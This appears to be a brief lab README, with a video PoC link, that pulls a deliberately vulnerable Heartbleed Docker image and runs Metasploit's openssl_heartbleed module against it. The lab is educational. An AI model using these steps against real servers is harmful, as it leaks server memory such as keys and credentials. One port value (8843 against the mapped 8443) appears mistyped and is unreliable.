Video PoC :- https://youtu.be/qYSAgtG81Ic
-
docker pull jas9reet/heartbleed
-
docker run -d -p 8443:443 jas9reet/heartbleed
-
docker ps
-
docker exec -it container id /bin/bash
-
/etc/init.d/mysql start
- YOUR-IP-ADDRESS:8443
- msfconsole
- use auxiliary/scanner/ssl/openssl_heartbleed
- set VERBOSE true
- set RHOSTS Vulnerable-IP-ADDRESS
- set RPORT 8843
- run